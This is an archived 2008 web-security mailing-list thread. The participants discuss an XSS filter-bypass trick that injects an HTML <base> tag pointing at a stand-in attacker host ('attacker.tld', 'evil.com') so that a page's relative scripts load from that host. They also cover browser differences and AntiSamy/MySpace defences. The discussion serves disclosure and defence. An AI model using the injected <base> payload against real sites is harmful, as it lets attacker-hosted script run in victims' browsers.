RE: [WEB SECURITY] Nice little XSS trick

["Arshan Dabirsiaghi" <arshan.dabirsiaghi@xxxxxxxxxxxxxxxxxx>]

No offense at all intended, but blaming developers for not following the
spec is easy but in the end just not very useful. When the most common
usage deviates from the spec, looking back at the past doesn't help
much. Incidentally, expecting your everyday Joe Coder to code to spec
when he receives no formal education of the spec is a very bizarre
phenomenon IMHO.

Microsoft's improvement of IE7's base-related behavior will trickle down
though, (un)fortunately. Since IE7 won't process a <base> outside of
<head>, developers will be forced to alter their sites so that their IE7
users won't have a broken site. So for sites of any worth, this will now
be a very corner case exploit.

I even tried wrapping the <base> exploit inside an injected <head> and
some other things to see if I could trick it into processing it, but
alas, nothing. Maybe Gareth should fuzz it - these browsers are too
liberal and I would be surprised if it was 100% bulletproof in this
respect.

Arshan

-----Original Message-----
From: elspood@xxxxxxxxx [mailto:elspood@xxxxxxxxx] On Behalf Of James
Landis
Sent: Wednesday, July 16, 2008 4:36 PM
To: Arshan Dabirsiaghi
Cc: David Byrne; Amit Klein; websecurity@xxxxxxxxxxxxx
Subject: Re: [WEB SECURITY] Nice little XSS trick

It's almost impossible if the attacker can inject a BASE tag into the
HEAD.

It's easy if they, oh I dunno, FOLLOW THE SPEC.

-j

On Wed, Jul 16, 2008 at 12:32 PM, Arshan Dabirsiaghi
<arshan.dabirsiaghi@xxxxxxxxxxxxxxxxxx> wrote:
> Yeah, and a typical, unfortunate reaction from sirdarkcat (not typical
> of him, just of the security community in general). It's different
> because it'd be trivially easy for the browser vendors to prevent the
> javascript: technique, but almost impossible to fix this variant.
>
> Arshan
>
> -----Original Message-----
> From: David Byrne [mailto:davidribyrne@xxxxxxxxx]
> Sent: Wednesday, July 16, 2008 3:30 PM
> To: Arshan Dabirsiaghi; Amit Klein
> Cc: websecurity@xxxxxxxxxxxxx
> Subject: Re: [WEB SECURITY] Nice little XSS trick
>
> I need to indulge my vanity :) I posted something similar almost a
year
> ago. Granted, I didn't take the time to write it up nicely.
>
> http://sla.ckers.org/forum/read.php?2,14751
>
>
>
>
> ----- Original Message ----
> From: Arshan Dabirsiaghi <arshan.dabirsiaghi@xxxxxxxxxxxxxxxxxx>
> To: Amit Klein <aksecurity@xxxxxxxxx>
> Cc: websecurity@xxxxxxxxxxxxx
> Sent: Wednesday, July 16, 2008 8:45:28 AM
> Subject: RE: [WEB SECURITY] Nice little XSS trick
>
> You're too nice - no need to apologize or defer credit. You discovered
> it on your own. If you can't find it in Google, CWE or the OWASP
Testing
> Guide, I frankly don't think you can call it public knowledge, and
> therefore it should be publicly discussed.
>
> Arshan
>
> -----Original Message-----
> From: Amit Klein [mailto:aksecurity@xxxxxxxxx]
> Sent: Wednesday, July 16, 2008 10:34 AM
> To: Arshan Dabirsiaghi
> Cc: websecurity@xxxxxxxxxxxxx
> Subject: Re: [WEB SECURITY] Nice little XSS trick
>
> Hi Arshan+list,
>
> Indeed - the same vulnerability. I did google for it, but I didn't
> pick up your site (and RSnake's cheat sheet doesn't list it - now I
> know why).
>
> Anyway - sorry. You deserve full credit for it, of course.
>
> Thanks for the correction and the further information,
> -Amit
>
>
> On 7/16/08, Arshan Dabirsiaghi <arshan.dabirsiaghi@xxxxxxxxxxxxxxxxxx>
> wrote:
>>
>>
>>
>> http://i8jesus.com/?p=10 (Jan 2008)
>>
>>
>> I also presented this vector last year at OWASP San Jose when I
> demo'ed
>> AntiSamy as an example of dangerous content that isn't malicious code
> on its
>> own. That's one of the selling points of AntiSamy - it stops not only
> XSS
>> (well, we hope) but also prevents phishing attacks that abuse
> HTML/CSS.
>>
>>
>>
>> I talked about it with RSnake afterwards and he had some crazy reason
> for
>> not putting it on his cheatsheet - claimed it was too much like the
> <base
>> href="javascript:foo();//"> vector. As noted on my blog post, IE7 is
> longer
>> (according to policy) supposed to be honoring <base> tags outside of
> <HEAD>,
>> but FF is still vulnerable. You could use this to hijack anything -
>> stylesheets (more XSS/phishing), images, scripts, etc. The only thing
> <base>
>> won't help you steal as far as resources is anything gathered in
> JavaScript.
>>
>>
>>
>> I think some of the big players had this figured out already (or more
>> likely, just got really lucky). MySpace takes <base href> values,
> base64
>> encodes them, and redirects them through another domain. The flow is
> like
>> this for them:
>>
>>
>>
>> 1.       User puts in <base href="http://evil.com";>
>>
>> 2.       Str = base64("http://evil.com";)
>>
>> 3.       Profile = <base
>> href="http://msplinks.com/redir?<base64encodedStr>
>>
>>
>>
>> Maybe there's a way to abuse that, but I don't think so. And eBay
> doesn't
>> have any relative links after user content, at least when I first
> looked at
>> this last year. They probably both just got lucky. =]
>>
>>
>>
>> Arshan
>>
>>
>>
>> ---------- Previous message ----------
>>
>> From: Amit Klein <aksecurity@xxxxxxxxx>
>>
>> Date: Tue, Jul 15, 2008 at 7:33 AM
>>
>> Subject: [WEB SECURITY] Nice little XSS trick
>>
>> To: Web Security <websecurity@xxxxxxxxxxxxx>
>>
>>
>>
>>
>>
>> Hi list
>>
>>
>>
>> Recently I've been thinking about bypassing anti-XSS filters, and a
> nice
>> little trick occurred to me, which I haven't seen anywhere (e.g. it's
> not on
>> RSnake's XSS cheat sheet - http://ha.ckers.org/xss.html; it does
> mention
>> BASe, but not the trick I describe here). The idea is to use the HTML
> BASE
>> tag to force loading of JS code from the attacker's host. Consider a
> page
>> with XSS vulnerability such as:
>>
>>
>>
>> <html>
>>
>> ...
>>
>> ***XSS code may be embedded here***
>>
>> ...
>>
>> <script src="/foo/bar.js"></script>
>>
>> ...
>>
>> </html>
>>
>>
>>
>> Now, an attacker can inject <base
>> href="http://www.attacker.tld/";>, and next thing you know,
>> the browser (IE, at least) loads the JS from
>> http://www.attacker.tld/foo/bar.js... And the beauty is
>> that there's no "explicit" JS code involved in the payload itself.
>>
>>
>>
>> Note that according to the HTML standard, BASE should be placed in
the
> HEAD
>> section
>> (http://www.w3.org/TR/html401/struct/links.html#edef-BASE).
>> This is indeed observed by FF 2, but not by IE (checked IE6).
>>
>>
>>
>> Thanks,
>>
>> -Amit
>
>
------------------------------------------------------------------------
> ----
> Join us on IRC: irc.freenode.net #webappsec
>
> Have a question? Search The Web Security Mailing List Archives:
> http://www.webappsec.org/lists/websecurity/archive/
>
> Subscribe via RSS:
> http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
>
> Join WASC on LinkedIn
> http://www.linkedin.com/e/gis/83336/4B20E4374DBA
>
>
>
>
>
------------------------------------------------------------------------
----
> Join us on IRC: irc.freenode.net #webappsec
>
> Have a question? Search The Web Security Mailing List Archives:
> http://www.webappsec.org/lists/websecurity/archive/
>
> Subscribe via RSS:
> http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
>
> Join WASC on LinkedIn
> http://www.linkedin.com/e/gis/83336/4B20E4374DBA
>
>

----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS:
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA